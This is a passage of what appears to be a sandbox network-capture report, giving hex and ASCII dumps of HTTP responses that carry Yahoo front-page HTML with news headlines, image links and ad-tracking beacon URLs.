                                                                                                                                                                        Data Ascii: quot;:{&quot;adchoicesUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;advertiseWithUsUrl&quot;:&quot;https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;,&quot;spons
                                                                                                                                                                        2023-06-02 11:13:21 UTC659INData Raw: 20 4f 76 28 68 29 20 73 74 72 65 61 6d 2d 72 65 6c 61 74 65 64 2d 64 72 61 77 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 74 61 72 67 65 74 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 66 65 65 64 62 61 63 6b 2d 64 69 61 6c 6f 67 22 3e 20 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 20 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 20 50 6f 73 28 72 29 20 42 67 63 28 2d 2d 77 68 69 74 65 29 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 75 75 69 64 3d 22 38 33 64 30 64 65 34 36 2d 65 63 62 37 2d 33 32 31 63 2d 61 66 34 63 2d 32 65 34 37 39 62 30 66 33 38 36 36 22 20
                                                                                                                                                                        Data Ascii: Ov(h) stream-related-drawer"><div class="drawer-fetch-target"></div></div><div class="adfeedback-dialog"> </div></div></div></li><li class="stream-item js-stream-content Pos(r) Bgc(--white)" data-type="1" data-uuid="83d0de46-ecb7-321c-af4c-2e479b0f3866"
                                                                                                                                                                        2023-06-02 11:13:21 UTC661INData Raw: 22 2d 31 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 57 28 31 30 30 25 29 20 42 64 72 73 28 32 70 78 29 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 75 75 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 57 50 52 70 74 49 6b 65 6e 73 45 4b 53 6b 71 6e 44 46 30 7a 58 51 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 79 4e 44 59 37 63 54 30 34 4d 44 74 33 50 54 51 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 73 61 63 72 61 6d 65 6e 74 6f 5f 62 65 65 5f 6d 63 63 6c 61 74 63 68 79 5f 35 36 39 2f 32 38 32 34 35 31 30 36 34 61 33 61 38 31 65 30 36 36 61 33 66 61 39 39 66 61 35 61 63 34 62 65 2e 63 66 2e 6a 70 67 22
                                                                                                                                                                        Data Ascii: "-1"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/WPRptIkensEKSkqnDF0zXQ--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/sacramento_bee_mcclatchy_569/282451064a3a81e066a3fa99fa5ac4be.cf.jpg"
                                                                                                                                                                        2023-06-02 11:13:21 UTC662INData Raw: 63 68 20 e2 80 94 20 75 6e 74 69 6c 20 74 75 72 6e 69 6e 67 20 6f 6e 20 74 68 65 20 6e 65 77 73 3b 22 20 64 61 74 61 2d 68 6f 73 74 65 64 2d 74 79 70 65 3d 22 48 4f 53 54 45 44 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 70 72 65 66 65 74 63 68 3d 22 31 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 75 75 69 64 3d 22 38 33 64 30 64 65 34 36 2d 65 63 62 37 2d 33 32 31 63 2d 61 66 34 63 2d 32 65 34 37 39 62 30 66 33 38 36 36 22 20 64 61 74 61 2d 73 74 6f 72 79 2d 6c 61 62 65 6c 3d 22 55 2e 53 2e 22 3e 3c 73 70 61 6e 20 69 64 3d 22 73 74 72 65 61 6d 5f 69 74 65 6d 5f 74 69 74 6c 65 5f 31 30 22 3e 52 75 6e 6e 65 72 20 64 69 64 6e e2 80 99 74 20 6b 6e 6f 77 20 68 65 20 6e 61 62 62 65 64 20 e2 80 98 69 6e 76 61 6c 75 61 62 6c 65 e2 80 99 20 66 69 6e 64 20 6f 6e
                                                                                                                                                                        Data Ascii: ch until turning on the news;" data-hosted-type="HOSTED" data-wf-caas-prefetch="1" data-wf-caas-uuid="83d0de46-ecb7-321c-af4c-2e479b0f3866" data-story-label="U.S."><span id="stream_item_title_10">Runner didnt know he nabbed invaluable find on
                                                                                                                                                                        2023-06-02 11:13:21 UTC663INData Raw: 3b 63 70 6f 73 79 26 71 75 6f 74 3b 3a 32 31 7d 2c 26 71 75 6f 74 3b 69 6e 74 6c 46 75 6a 69 55 69 43 6f 6e 66 69 67 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 72 6f 75 6e 64 65 64 43 6f 72 6e 65 72 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 75 73 65 56 65 72 74 69 63 61 6c 43 6f 6e 74 72 6f 6c 49 63 6f 6e 73 26 71 75 6f 74 3b 3a 66 61 6c 73 65 7d 2c 26 71 75 6f 74 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6e 63 70 50 61 72 61 6d 73 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 71 75 65 72 79 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 70 61 67 65 43 6f 6e 74 65 78 74 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 75 26
                                                                                                                                                                        Data Ascii: ;cposy&quot;:21},&quot;intlFujiUiConfig&quot;:{&quot;roundedCorner&quot;:false,&quot;useVerticalControlIcons&quot;:false},&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&
                                                                                                                                                                        2023-06-02 11:13:21 UTC664INData Raw: 76 20 63 6c 61 73 73 3d 22 4d 69 68 28 31 34 30 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 79 28 31 32 70 78 29 20 50 6f 73 28 72 29 20 43 66 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 6c 28 73 74 61 72 74 29 20 50 6f 73 28 72 29 20 4d 65 6e 64 28 32 35 70 78 29 20 4d 61 77 28 32 32 30 70 78 29 20 57 28 32 36 25 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 28 30 29 20 54 28 30 70 78 29 20 42 64 72 73 28 32 70 78 29 20 53 74 61 72 74 28 30 29 20 50 6f 73 28 72 29 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 35 2e 39 31 25 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2f
                                                                                                                                                                        Data Ascii: v class="Mih(140px)"><div class="Py(12px) Pos(r) Cf"><div class="Fl(start) Pos(r) Mend(25px) Maw(220px) W(26%)"><div class="H(0) T(0px) Bdrs(2px) Start(0) Pos(r)" style="padding-bottom:55.91%" data-test-locator="stream-item-image"><a href="/entertainment/
                                                                                                                                                                        2023-06-02 11:13:21 UTC666INData Raw: 65 6d 2d 70 75 62 6c 69 73 68 65 72 5f 31 31 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 70 75 62 6c 69 73 68 65 72 22 3e 50 65 6f 70 6c 65 3c 2f 64 69 76 3e 3c 68 33 20 63 6c 61 73 73 3d 22 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 32 2e 36 65 6d 29 20 4d 62 28 34 70 78 29 20 4d 62 28 30 29 2d 2d 6d 64 31 31 36 30 20 4d 74 28 30 29 20 4c 68 28 31 2e 33 29 20 46 7a 28 31 39 70 78 29 20 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 20 77 61 66 65 72 2d 63 61 61 73
                                                                                                                                                                        Data Ascii: em-publisher_11" data-test-locator="stream-item-publisher">People</div><h3 class="LineClamp(2,2.6em) Mb(4px) Mb(0)--md1160 Mt(0) Lh(1.3) Fz(19px) stream-item-title" data-test-locator="stream-item-title"><a class="js-content-viewer rapidnofollow wafer-caas
                                                                                                                                                                        2023-06-02 11:13:21 UTC667INData Raw: 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 73 75 6d 6d 61 72 79 22 3e 41 75 62 72 65 79 20 53 63 61 6c 65 74 74 61 20 77 61 73 20 69 6e 20 65 6d 65 72 67 65 6e 63 79 20 73 75 72 67 65 72 79 20 66 6f 72 20 73 69 78 20 68 6f 75 72 73 20 26 71 75 6f 74 3b 74 6f 20 72 65 70 61 69 72 20 68 65 72 20 61 6d 70 75 74 61 74 65 64 20 66 65 65 74 2c 26 71 75 6f 74 3b 20 61 63 63 6f 72 64 69 6e 67 20 74 6f 20 74 68 65 20 56 69 72 67 69 6e 69 61 20 53 74 61 74 65 20 50 6f 6c 69 63 65 20 41 73 73 6f 63 69 61 74 69 6f 6e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 20 50 6f 73 28 72 29 22 3e 3c 64 69 76 20 64 61 74 61 2d 62 75 63 6b 65 74 3d 22 39 30 30 22 20 64
                                                                                                                                                                        Data Ascii: tor="stream-item-summary">Aubrey Scaletta was in emergency surgery for six hours &quot;to repair her amputated feet,&quot; according to the Virginia State Police Association</p></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" d
                                                                                                                                                                        2023-06-02 11:13:21 UTC668INData Raw: 72 2d 66 65 74 63 68 2d 74 61 72 67 65 74 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 22 6f 6e 4c 6f 61 64 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 3f 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 61 6d 70 3b 6d 5f 69 64 3d 72 65 61 63 74 2d 77 61 66 65 72 2d 73 74 72 65 61 6d 26 61 6d 70 3b 63 74 72 6c 3d 53 74 72 65 61 6d 52 65 6c 61 74 65 64 22 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 64 72 61 77 65 72 20 54 72 73 64 65 28 30 2e 33 73 29 20 54 72 73 64 75 28 30 2e 37 73 29 20 54 72 73 74 66 28 65 69 6f 29 20 54 72 73 70 28 6d 61 78 2d 68 65 69 67 68 74 29 20 4d 61 68 28 30 70 78 29 20 73 68 6f 77 2d 64 72 61 77 65 72 5f 4d 61 68 28 32 38 30 70 78 29 20 44 28 6e 29 20 64 72 61 77 65 72 2d 62
                                                                                                                                                                        Data Ascii: r-fetch-target" data-wf-trigger="onLoad" data-wf-url="/fp_ms/_rcv/remote?m_mode=json&amp;m_id=react-wafer-stream&amp;ctrl=StreamRelated" class="stream-drawer Trsde(0.3s) Trsdu(0.7s) Trstf(eio) Trsp(max-height) Mah(0px) show-drawer_Mah(280px) D(n) drawer-b
                                                                                                                                                                        2023-06-02 11:13:21 UTC670INData Raw: 79 3b 67 3a 64 30 33 39 35 66 33 38 2d 34 63 30 35 2d 33 38 36 37 2d 62 36 64 63 2d 65 33 61 37 30 37 32 36 34 64 34 35 3b 67 72 70 74 3a 73 69 6e 67 6c 65 73 74 6f 72 79 3b 70 6b 67 74 3a 6f 72 70 68 61 6e 5f 69 6d 67 3b 70 6f 73 3a 31 3b 63 6e 74 5f 74 70 63 3a 53 63 69 65 6e 63 65 3b 73 6c 6b 3a e2 80 98 41 73 74 6f 6e 69 73 68 69 6e 67 e2 80 99 20 63 72 65 61 74 75 72 65 20 62 75 72 72 6f 77 73 20 75 6e 64 65 72 20 63 61 6e 61 6c 73 20 61 6e 64 20 6c 61 67 6f 6f 6e 73 2e 20 49 74 e2 80 99 73 20 61 20 6e 65 77 20 73 70 65 63 69 65 73 2c 20 73 74 75 64 79 20 73 61 79 73 3b 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 22 20
                                                                                                                                                                        Data Ascii: y;g:d0395f38-4c05-3867-b6dc-e3a707264d45;grpt:singlestory;pkgt:orphan_img;pos:1;cnt_tpc:Science;slk:Astonishing creature burrows under canals and lagoons. Its a new species, study says;" aria-hidden="true" class="js-content-viewer rapidnofollow"
                                                                                                                                                                        2023-06-02 11:13:21 UTC671INData Raw: 3b 72 73 70 6e 73 3a 6e 61 76 3b 74 31 3a 61 33 3b 74 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 63 63 6f 64 65 3a 6d 65 67 61 73 74 72 65 61 6d 5f 75 6e 69 66 69 65 64 5f 5f 65 6e 2d 55 53 5f 5f 66 72 6f 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6d 61 69 6e 2e 66 70 45 78 70 6c 3b 63 74 3a 73 74 6f 72 79 3b 67 3a 64 30 33 39 35 66 33 38 2d 34 63 30 35 2d 33 38 36 37 2d 62 36 64 63 2d 65 33 61 37 30 37 32 36 34 64 34 35 3b 67 72 70 74 3a 73 69 6e 67 6c 65 73 74 6f 72 79 3b 70 6b 67 74 3a 6f 72 70 68 61 6e 5f 69 6d 67 3b 70 6f 73 3a 31 3b 63 6e 74 5f 74 70 63 3a 53 63 69 65 6e 63 65 3b 73 6c 6b 3a e2 80 98 41 73 74 6f 6e 69 73 68 69 6e 67 e2 80 99 20 63 72 65 61 74 75 72 65 20 62 75 72
                                                                                                                                                                        Data Ascii: ;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__main.fpExpl;ct:story;g:d0395f38-4c05-3867-b6dc-e3a707264d45;grpt:singlestory;pkgt:orphan_img;pos:1;cnt_tpc:Science;slk:Astonishing creature bur
                                                                                                                                                                        2023-06-02 11:13:21 UTC672INData Raw: 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 44 72 61 77 65 72 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 41 64 4c 69 74 65 55 70 53 65 6c 6c 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 74 72 75 65 7d 2c 26 71 75 6f 74 3b 66 65 61 74 75 72 65 73 26 71 75 6f 74 3b 3a 7b 7d 2c 26 71 75 6f 74 3b 69 31 33 6e 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 4c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 63 69 65 6e 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 70 6f 73 26 71 75 6f 74 3b 3a 31 32 2c 26 71
                                                                                                                                                                        Data Ascii: /en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;Science&quot;,&quot;cpos&quot;:12,&q
                                                                                                                                                                        2023-06-02 11:13:21 UTC673INData Raw: 20 64 61 74 61 2d 77 66 2d 62 65 61 63 6f 6e 73 3d 22 68 74 74 70 73 3a 2f 2f 62 65 61 70 2e 67 65 6d 69 6e 69 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6d 62 63 73 63 3f 62 76 3d 31 2e 30 2e 30 26 61 6d 70 3b 65 73 3d 79 6b 75 6b 41 6d 6f 47 49 53 38 51 6b 70 6b 31 77 65 62 68 4d 63 74 2e 43 61 37 68 37 32 5f 69 44 6a 44 30 41 48 4e 4f 52 44 4e 79 30 59 76 66 2e 50 76 71 6d 72 4b 2e 55 49 7a 6c 56 4b 6e 52 4e 68 30 77 31 6d 30 41 50 63 67 4c 5a 32 66 38 55 79 48 6a 35 71 69 54 67 72 5f 38 68 37 61 69 4d 79 72 44 59 48 2e 38 7a 6e 43 6b 4f 53 4e 39 4b 45 65 69 31 58 42 37 6e 77 4a 6d 6d 6b 71 5a 54 7a 5a 4d 75 71 74 4d 56 31 39 55 51 43 75 79 76 63 55 2e 75 4b 6a 45 67 4b 36 69 72 34 39 77 69 68 4f 73 71 33 79 39 4f 78 54 5a 49 34 6d 67 35 73 45 63 73 45 45 34 69
                                                                                                                                                                        Data Ascii: data-wf-beacons="https://beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=ykukAmoGIS8Qkpk1webhMct.Ca7h72_iDjD0AHNORDNy0Yvf.PvqmrK.UIzlVKnRNh0w1m0APcgLZ2f8UyHj5qiTgr_8h7aiMyrDYH.8znCkOSN9KEei1XB7nwJmmkqZTzZMuqtMV19UQCuyvcU.uKjEgK6ir49wihOsq3y9OxTZI4mg5sEcsEE4i
                                                                                                                                                                        2023-06-02 11:13:21 UTC675INData Raw: 73 35 77 66 35 77 2e 42 56 43 49 70 5a 67 71 62 71 69 36 59 48 54 50 37 45 68 2e 49 67 50 73 68 6b 42 36 65 4c 45 69 5a 63 36 57 56 45 47 4b 52 71 6b 39 50 54 62 74 41 37 64 61 73 67 69 31 74 4a 49 6a 32 61 51 49 6c 35 45 68 64 7a 79 4c 58 36 73 51 64 36 41 45 78 62 51 6b 59 4e 46 45 67 44 47 55 76 30 6f 38 44 78 6b 50 43 66 5f 59 72 73 43 48 63 5a 39 74 79 45 71 4b 6d 62 45 4e 49 47 37 6a 54 53 69 62 45 6c 32 6b 2d 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 79 6c 6b 3d 22 65 6c 6d 3a 69 6d 67 3b 65 6c 6d 74 3a 61 64 3b 69 74 63 3a 30 3b 62 70 6f 73 3a 31 3b 63 70 6f 73 3a 31 33 3b 63 70 6f 73 79 3a 32 34 3b 72 73 70 6e 73 3a
                                                                                                                                                                        Data Ascii: s5wf5w.BVCIpZgqbqi6YHTP7Eh.IgPshkB6eLEiZc6WVEGKRqk9PTbtA7dasgi1tJIj2aQIl5EhdzyLX6sQd6AExbQkYNFEgDGUv0o8DxkPCf_YrsCHcZ9tyEqKmbENIG7jTSibEl2k-" rel="nofollow noopener noreferrer" target="_blank" data-ylk="elm:img;elmt:ad;itc:0;bpos:1;cpos:13;cposy:24;rspns:
                                                                                                                                                                        2023-06-02 11:13:21 UTC676INData Raw: 67 3b 70 6f 73 3a 31 3b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 41 64 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 44 28 69 29 20 46 7a 28 31 32 70 78 29 20 43 28 24 73 74 72 65 61 6d 49 74 65 6d 47 72 61 79 29 20 45 6c 6c 20 4d 62 28 32 70 78 29 20 54 64 28 6e 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 61 70 2e 67 65 6d 69 6e 69 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6d 62 63 6c 6b 3f 62 76 3d 31 2e 30 2e 30 26 61 6d 70 3b 65 73 3d 4c 72 59 4b 64 6e 49 47 49 53 38 39 6e 4a 4b 52 57 5f 45 33 69 48 77 4a 53 5a 33 43 6d 32 33 59 30 2e 63 31 55 35 58 58 4d 58 4f 4a 4b 48 77 67 30 33 4e 7a 74 38 4b 70 6e 75 48 36 41 6f 54 68 54 50 4f 32
                                                                                                                                                                        Data Ascii: g;pos:1;" rel="nofollow noopener noreferrer" target="_blank">Ad</a><a class="D(i) Fz(12px) C($streamItemGray) Ell Mb(2px) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=LrYKdnIGIS89nJKRW_E3iHwJSZ3Cm23Y0.c1U5XXMXOJKHwg03Nzt8KpnuH6AoThTPO2
                                                                                                                                                                        2023-06-02 11:13:21 UTC677INData Raw: 5f 43 28 2d 2d 64 6f 72 79 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 61 70 2e 67 65 6d 69 6e 69 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6d 62 63 6c 6b 3f 62 76 3d 31 2e 30 2e 30 26 61 6d 70 3b 65 73 3d 4c 72 59 4b 64 6e 49 47 49 53 38 39 6e 4a 4b 52 57 5f 45 33 69 48 77 4a 53 5a 33 43 6d 32 33 59 30 2e 63 31 55 35 58 58 4d 58 4f 4a 4b 48 77 67 30 33 4e 7a 74 38 4b 70 6e 75 48 36 41 6f 54 68 54 50 4f 32 56 49 68 4a 66 4a 55 6c 44 6c 50 45 2e 4e 61 71 50 51 43 57 4e 69 46 46 6a 4a 72 52 75 54 5a 76 70 39 65 53 6a 32 76 6f 5a 64 4e 42 6e 69 42 70 6a 63 53 4e 55 6e 6f 51 44 54 55 49 44 57 53 78 4f 68 75 52 48 62 63 59 30 47 77 47 39 31 58 38 43 33 76 38 36 4d 46 48 77 65 43 77 38 64 6b 32 74 75 43 75 63 6c 67 6b 43 4d 61 31 35 38 30 63 55 41 66 51 6a
                                                                                                                                                                        Data Ascii: _C(--dory)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=LrYKdnIGIS89nJKRW_E3iHwJSZ3Cm23Y0.c1U5XXMXOJKHwg03Nzt8KpnuH6AoThTPO2VIhJfJUlDlPE.NaqPQCWNiFFjJrRuTZvp9eSj2voZdNBniBpjcSNUnoQDTUIDWSxOhuRHbcY0GwG91X8C3v86MFHweCw8dk2tuCuclgkCMa1580cUAfQj
                                                                                                                                                                        2023-06-02 11:13:21 UTC677INData Raw: 65 70 31 2e 38 63 6e 74 2e 35 4d 34 4c 54 52 56 74 66 5a 73 35 75 47 6c 4c 6d 54 78 4a 75 6b 38 62 66 37 72 69 57 34 5a 77 38 45 50 4d 7a 72 31 41 4f 45 44 38 4b 4e 34 46 72 32 39 62 2e 4b 79 6d 34 46 76 35 4f 6f 54 4d 47 35 31 4c 61 48 34 44 4e 35 55 47 34 69 65 56 7a 79 4c 7a 78 53 7a 47 4a 31 45 42 61 47 57 38 75 56 31 34 4c 48 6f 63 38 48 6a 70 62 51 42 68 74 4c 48 37 7a 6f 6d 65 52 70 79 64 68 63 7a 67 6a 79 62 45 50 6e 6c 37 5f 41 47 33 31 55 34 79 35 45 50 76 6b 37 33 6a 37 37 43 70 46 30 31 7a 4a 4c 36 6e 72 53 75 35 54 70 48 6e 4f 70 50 66 75 5a 4f 69 52 33 4c 76 78 6c 6c 6c 36 61 73 38 49 54 6e 4f 6e 76 58 4b 32 47 51 6e 7a 54 34 4b 2e 6d 69 48 2e 49 51 48 48 58 42 48 62 54 35 55 68 43 69 4b 34 4f 63 30 33 72 49 50 73 37 51 7a 6e 79 43 75 74 4b
                                                                                                                                                                        Data Ascii: ep1.8cnt.5M4LTRVtfZs5uGlLmTxJuk8bf7riW4Zw8EPMzr1AOED8KN4Fr29b.Kym4Fv5OoTMG51LaH4DN5UG4ieVzyLzxSzGJ1EBaGW8uV14LHoc8HjpbQBhtLH7zomeRpydhczgjybEPnl7_AG31U4y5EPvk73j77CpF01zJL6nrSu5TpHnOpPfuZOiR3Lvxlll6as8ITnOnvXK2GQnzT4K.miH.IQHHXBHbT5UhCiK4Oc03rIPs7QznyCutK
                                                                                                                                                                        2023-06-02 11:13:21 UTC679INData Raw: 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 20 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 20 50 6f 73 28 72 29 20 42 67 63 28 2d 2d 77 68 69 74 65 29 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 75 75 69 64 3d 22 64 65 31 66 61 39 35 37 2d 31 62 35 37 2d 33 61 32 66 2d 39 33 34 34 2d 39 63 39 33 37 30 37 34 30 61 66 32 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 31 34 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 32 35 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 36 36 31 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 57 61 6c 74 5f 44 69 73 6e 65 79 5f 57 6f 72 6c 64 2c 52 6f 6e 5f 44 65 53 61 6e 74 69 73 2c 44 69 73 6e 65 79 5f 50 61 72 6b 73 2c 5f 45 78 70 65 72 69 65 6e
                                                                                                                                                                        Data Ascii: ></div></li><li class="stream-item js-stream-content Pos(r) Bgc(--white)" data-type="1" data-uuid="de1fa957-1b57-3a2f-9344-9c9370740af2" data-cpos="14" data-cposy="25" data-ycts="001000661" data-wikis="Walt_Disney_World,Ron_DeSantis,Disney_Parks,_Experien
                                                                                                                                                                        2023-06-02 11:13:21 UTC680INData Raw: 32 37 3b 20 72 65 6c 61 74 69 76 65 20 6f 77 6e 73 20 73 74 6f 63 6b 20 69 6e 20 74 68 65 20 63 6f 6d 70 61 6e 79 2e 20 41 20 54 72 75 6d 70 20 61 70 70 6f 69 6e 74 65 65 20 77 69 6c 6c 20 72 65 70 6c 61 63 65 20 68 69 6d 2e 3b 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 57 28 31 30 30 25 29 20 42 64 72 73 28 32 70 78 29 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 75 75 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 42 41 4c 62 49 70 56 4e 54 47 33 50 56 41 5f 36 46 74 34 52 6a 41 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52
                                                                                                                                                                        Data Ascii: 27; relative owns stock in the company. A Trump appointee will replace him.;" aria-hidden="true" class="js-content-viewer rapidnofollow" tabindex="-1"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/BALbIpVNTG3PVA_6Ft4RjA--~B/Zmk9c3R
                                                                                                                                                                        2023-06-02 11:13:21 UTC681INData Raw: 2d 31 62 35 37 2d 33 61 32 66 2d 39 33 34 34 2d 39 63 39 33 37 30 37 34 30 61 66 32 3b 67 72 70 74 3a 73 74 6f 72 79 43 6c 75 73 74 65 72 3b 70 6b 67 74 3a 63 6c 75 73 74 65 72 5f 61 6c 6c 5f 69 6d 67 3b 70 6f 73 3a 31 3b 63 6e 74 5f 74 70 63 3a 55 2e 53 2e 3b 73 6c 6b 3a 54 68 65 20 6a 75 64 67 65 20 61 73 73 69 67 6e 65 64 20 74 6f 20 68 65 61 72 20 44 69 73 6e 65 79 26 23 78 32 37 3b 73 20 6c 61 77 73 75 69 74 20 61 67 61 69 6e 73 74 20 52 6f 6e 20 44 65 53 61 6e 74 69 73 20 6a 75 73 74 20 64 69 73 71 75 61 6c 69 66 69 65 64 20 68 69 6d 73 65 6c 66 20 66 72 6f 6d 20 74 68 65 20 63 61 73 65 20 62 65 63 61 75 73 65 20 61 20 26 23 78 32 37 3b 74 68 69 72 64 2d 64 65 67 72 65 65 26 